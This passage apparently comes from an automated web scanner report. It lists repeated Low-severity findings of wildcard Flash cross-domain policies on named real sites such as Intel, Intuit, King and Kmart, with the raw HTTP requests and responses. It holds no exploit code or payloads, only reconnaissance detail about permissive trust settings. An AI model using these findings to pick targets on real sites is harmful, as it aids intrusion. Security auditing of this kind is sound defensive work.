P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.imdb.com" />
<allow-access-from domain="*.imdb.de" />
<allow-access-from domain="*.imdb.es" />
<allow-access-from domain="*.imdb.it" />
<allow-access-from domain="*.imdb.fr" />
<allow-access-from domain="*.imdb.pt" />
<allow-access-from domain="*.imdb.me" />
<allow-access-from domain="*.media-imdb.com" />
...[SNIP]...

7.298. http://www.indiatimes.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.indiatimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.indiatimes.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 10 May 2010 10:00:59 GMT
ETag: "eeb0e4b027f0ca1:633"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=162641
Date: Sat, 02 Apr 2011 14:02:48 GMT
Content-Length: 917
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.indiatimes.com" secure="true" />
<allow-access-from domain="*.timesgroup.com" secure="true" />
<allow-access-from domain="*.timesofindia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.economictimes.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.ethindi.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.etgujarati.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.idiva.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.itimes.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.hotklix.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.absoluteradio.co.in" secure="true" />
...[SNIP]...
<allow-access-from domain="*.absoluteradio.co.uk" secure="true" />
...[SNIP]...
<allow-access-from domain="*.indiatimes.co.in" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...

7.299. http://www.infoplease.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.infoplease.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.infoplease.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:24 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.1301751444430401; path=/; expires=Sun, 01-Apr-12 13:37:24 GMT
Last-Modified: Thu, 28 Oct 2010 21:07:40 GMT
ETag: "1cd-493b3bb70bf00"
Accept-Ranges: bytes
Content-Length: 461
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:37:24 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.infoplease.com" />
<allow-ac
...[SNIP]...
<allow-access-from domain="*.infoplease.info" />
<allow-access-from domain="i.infopls.com" />
<allow-access-from domain="*.familyeducation.com" />
...[SNIP]...

7.300. http://www.intel.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.intel.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.intel.com

Response

HTTP/1.0 200 OK
Content-Length: 290
Content-Type: text/xml
Last-Modified: Tue, 10 Jan 2006 16:04:48 GMT
Accept-Ranges: bytes
ETag: "78bab694ff15c61:431f"
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Date: Sat, 02 Apr 2011 14:04:59 GMT
Connection: close

...<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy>
<allow-access-from domain="*.spillinova.com" />
<allow-access-from domain="*.intel.com" />
<allow-access-from domain="*.intel.com/cd/" />
<allow-access-from domain = "intel.speedera.net"/>
...[SNIP]...

7.301. http://www.intuit.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.intuit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.intuit.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:41 GMT
Server: Apache
Last-Modified: Mon, 28 Mar 2011 05:24:24 GMT
Accept-Ranges: bytes
Content-Length: 410
Cache-Control: max-age=604800
Expires: Sat, 09 Apr 2011 13:39:41 GMT
Vary: Accept-Encoding
P3P: policyref="http://smallbusiness.intuit.com/small-business/privacy/index.jsp",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="*.intuit.com" to-ports="*" />
...[SNIP]...

7.302. http://www.ioffer.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ioffer.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ioffer.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:04 GMT
Server: PWS/1.7.1.5
X-Px: ms jfk-agg-n68 ( jfk-agg-n69), ms jfk-agg-n69 ( sjc-ag1-n2), ms sjc-ag1-n2 ( origin)
Cache-Control: private
Content-Length: 214
Content-Type: text/xml
Last-Modified: Sat, 25 Apr 2009 21:28:14 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ioffer.com" />
</cross-d
...[SNIP]...

7.303. http://www.istockphoto.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.istockphoto.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.istockphoto.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Server: BigIP
Content-Length: 286
Date: Sat, 02 Apr 2011 14:16:11 GMT
Connection: close

<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="by-cont
...[SNIP]...
<allow-access-from domain="*.istockphoto.com" />
...[SNIP]...

7.304. http://www.itt-tech.edu/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.itt-tech.edu
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.itt-tech.edu

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:29:07 GMT
Server: Apache/2.0.55 (Unix) JRun/4.0
Last-Modified: Thu, 25 Jun 2009 15:28:29 GMT
ETag: "9974-100-e02f6140"
Accept-Ranges: bytes
Content-Length: 256
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ittesi.com" />
<allow-access-from domain="*.itt-tech.edu" />
...[SNIP]...

7.305. http://www.iwin.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.iwin.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.iwin.com

Response

HTTP/1.1 200 OK
ETag: W/"219-1296818118000"
Last-Modified: Fri, 04 Feb 2011 11:15:18 GMT
Content-Type: application/xml
Server: Apache
Content-Length: 219
Date: Sat, 02 Apr 2011 13:42:08 GMT
X-Varnish: 931872643
Age: 0
Via: 1.1 varnish
Connection: close

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*.iwin.com" />
<allow-http-request-headers-from domain="*.iwin.com" headers="*"/>
</cro
...[SNIP]...

7.306. http://www.jtv.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.jtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.jtv.com

Response

HTTP/1.0 200 OK
Server: Demandware eCommerce Server
Cache-Control: public;max-age=54515
Expires: Sun, 03 Apr 2011 05:28:27 GMT
Last-Modified: Thu, 31 Mar 2011 17:58:19 GMT
Content-Type: application/xml
Date: Sat, 02 Apr 2011 14:19:52 GMT
Content-Length: 332
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="demandware.edgesuite.net" />
<allow-access-from domain="*.jtv.com" />
<allow-access-from domain="*.jewelrytelevision.com" />
...[SNIP]...

7.307. http://www.justin.tv/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.justin.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.justin.tv

Response

HTTP/1.0 200 OK
Server: nginx
Content-Type: text/xml
Last-Modified: Fri, 01 Apr 2011 23:54:55 GMT
Date: Sat, 02 Apr 2011 13:33:28 GMT
Content-Length: 798
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.myspacecdn.com" />
<allow-access-from domain="*.myspace.com" />
<allow-access-from domain="*.justin.tv" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.staging.justin.tv" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="localhost" to-ports="*" />
...[SNIP]...
<allow-access-from domain="bitcast-d.bitgravity.com" />
...[SNIP]...

7.308. http://www.kaboose.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kaboose.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kaboose.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:43 GMT
Server: Apache/2.2.11 (Unix) DAV/2 PHP/4.4.9
Last-Modified: Tue, 17 Jun 2008 20:31:23 GMT
ETag: "f963c-324-44fe2a0a1bcc0"
Accept-Ranges: bytes
Content-Length: 804
Keep-Alive: timeout=5, max=79
Connection: close
Content-Type: application/xml
X-UA-COMPATIBLE: IE=EmulateIE7

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.kaboose.com" />
<allow-access-from domain="funschool.kaboose.com" />
<allow-access-from domain="*.kaboose.ca" />
<allow-access-from domain="*.kidsdomain.com" />
<allow-access-from domain="*.funschool.com" />
<allow-access-from domain="*.zeeks.com" />
<allow-access-from domain="*.zeeks.ca" />
<allow-access-from domain="games.zeeks.com" />

<allow-access-from domain="*.babyzone.com"/>
<allow-access-from domain="*.bounty.com"/>
<allow-access-from domain="games.zeeks.ca" />
<allow-access-from domain="*.kaboosenetwork.com" />
<allow-access-from domain="*.birthdayinabox.com" />
<allow-access-from domain="*.bubbleshare.com" />

<allow-access-from domain="*.pointroll.com" />
...[SNIP]...

7.309. http://www.kbb.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kbb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kbb.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=864000
Content-Type: text/xml
Last-Modified: Wed, 23 Mar 2011 15:13:32 GMT
Accept-Ranges: bytes
ETag: "0f629df6ce9cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:25:24 GMT
Connection: close
Content-Length: 217
Set-Cookie: BIGipServerpool_kbb.com=1964053514.20480.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.brightcove.com" />
</cro
...[SNIP]...

7.310. http://www.kenexa.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kenexa.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kenexa.com

Response

HTTP/1.1 200 OK
Content-Length: 324
Content-Type: text/xml
Last-Modified: Thu, 16 Oct 2008 16:15:07 GMT
Accept-Ranges: bytes
ETag: "a259d75aaa2fc91:3be"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:20:08 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.tommyweir.com" />
<allow-access-from domain="*.ceoshift.com" />
<allow-access-from domain="*.theceoshift.com" />
...[SNIP]...

7.311. http://www.king.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.king.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.king.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:44 GMT
Server: Apache
Expires: Sat, 02 Apr 2011 14:05:44 GMT
Content-Length: 9685
Content-Type: text/xml; charset=iso-8859-1
Link: </labels.rdf>; /="/"; rel="meta" type="application/rdf+xml"; title="ICRA labels";
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-onl
...[SNIP]...
<allow-access-from domain="*.king.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.midasplayer.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.royalgames.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="cash-games.gmx.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="cash.games.web.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="de.midas.games.yahoo.net" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="esv.rtl.king.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="esv.rtl.midasplayer.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="fr.midas.games.yahoo.net" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="games.blip.se" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="games.firstream.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="images.mygame.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="king.alice.aol.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="king.at.aol.de " secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="king.games.co.uk" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="king.gamesgames.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="king.it.msn.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="king.juegos.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="midasplayer.aol.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="midasplayer.onet.pl" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="midasplayer.tiscali.it" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="midasplayer.wanadoo.nl" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="pottipelit.pelikone.fi" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="pottipelit.taukopelit.fi" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="prosieben.king.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="prosieben.midasplayer.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="rtl.king.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="rtl.midasplayer.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="rtl2.king.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="rtl2.midasplayer.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="sat1.king.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="sat1.midasplayer.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="spelhallen.msn.se" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="spiele.wunderweib.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="spray.midasplayer.se" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="turnier.freenet.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="turnier.tvmovie.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="uk.midas.games.yahoo.net" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.blipgame.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.king-spiele.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.king.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.mygame.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.play22.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.royalgames-online.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.royalgames.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.skillgames.co.uk" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.spelduel.nl" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="i1.midasplayer.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="king.pantherssl.com" secure="false" to-ports="*" />
...[SNIP]...

7.312. http://www.kmart.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kmart.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 23 Mar 2011 19:03:42 GMT
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:28:09 GMT
Content-Length: 2829
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.sears.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.kenmore.com"/>
   <allow-access-from domain="*.media.richrelevance.com"/>
   <allow-access-from domain="*.recs.richrelevance.com"/>
   <allow-access-from domain="*.ecircular.richrelevance.com"/>
   <allow-access-from domain="*.staging.richrelevance.com"/>
   <allow-access-from domain="*.ecircular-staging.richrelevance.com"/>
   <allow-access-from domain="*.ecircular-staging2.richrelevance.com"/>
   <allow-access-from domain="*.demo.richrelevance.com"/>
   <allow-access-from domain="*.integration.richrelevance.com"/>
   <allow-access-from domain="*.rp.richrelevance.com"/>
   <allow-access-from domain="*.shc.richrelevance.com"/>
   <allow-access-from domain="*.shc-staging.richrelevance.com"/>
   <allow-access-from domain="*.shc-qa.richrelevance.com"/>
   <allow-access-from domain="*.allurent.net" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.fuelindustries.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cmycasa.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.fluid.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cerosmedia.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.cerosdevelopment.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.lightmakerorlando.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.cerosstaging.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.sears.fluid.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fluid.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.craftsman.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.allurent.net" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.productiveedge.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.zemoga.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kenmore.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.kmart.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.searstestsite.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.catapultclients.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.catapultmarketing.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.colossal-squid.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.digitalfolio.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.sears.realartusa.com" to-ports="*" secure="true" />
...[SNIP]...

7.313. http://www.kodakgallery.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kodakgallery.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kodakgallery.com

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=25A692A689E0AB11E4BA608EE3F0B25C.ecom604_main; Domain=kodakgallery.com; Path=/
Set-Cookie: sourceId=500019816903; Domain=kodakgallery.com; Expires=Mon, 02-May-2011 13:33:57 GMT; Path=/
Set-Cookie: sourceId=null; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: DYN_EMAIL=anon_mem1162409204@kodakgallery.com; Domain=kodakgallery.com; Path=/
Set-Cookie: ft_80002=editACopyTest; Domain=kodakgallery.com; Expires=Sun, 01-Apr-2012 13:33:57 GMT; Path=/
Set-Cookie: abTest=ft_80002-; Domain=kodakgallery.com; Expires=Sun, 01-Apr-2012 13:33:57 GMT; Path=/
ETag: W/"707-1301619341000"
Last-Modified: Fri, 01 Apr 2011 00:55:41 GMT
Content-Type: text/xml
Content-Length: 707
Date: Sat, 02 Apr 2011 13:33:57 GMT
Connection: close
Server: ecom604

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/>
...[SNIP]...
<allow-access-from domain="*.ofoto.com"/>
...[SNIP]...
<allow-access-from domain="*.kodak.com"/>
...[SNIP]...
<allow-access-from domain="*.kodakgallery.com"/>
...[SNIP]...
<allow-access-from domain="*.hippiepix.com"/>
...[SNIP]...

7.314. http://www.kraftrecipes.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kraftrecipes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kraftrecipes.com

Response

HTTP/1.0 200 OK
Content-Length: 758
Content-Type: text/xml
Content-Location: http://www.kraftrecipes.com/crossdomain.xml
Last-Modified: Mon, 07 Mar 2011 20:34:46 GMT
Accept-Ranges: bytes
ETag: "b3afc3187ddcb1:5897"
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6510
X-Powered-By: ASP.NET
Vary: Accept-Encoding
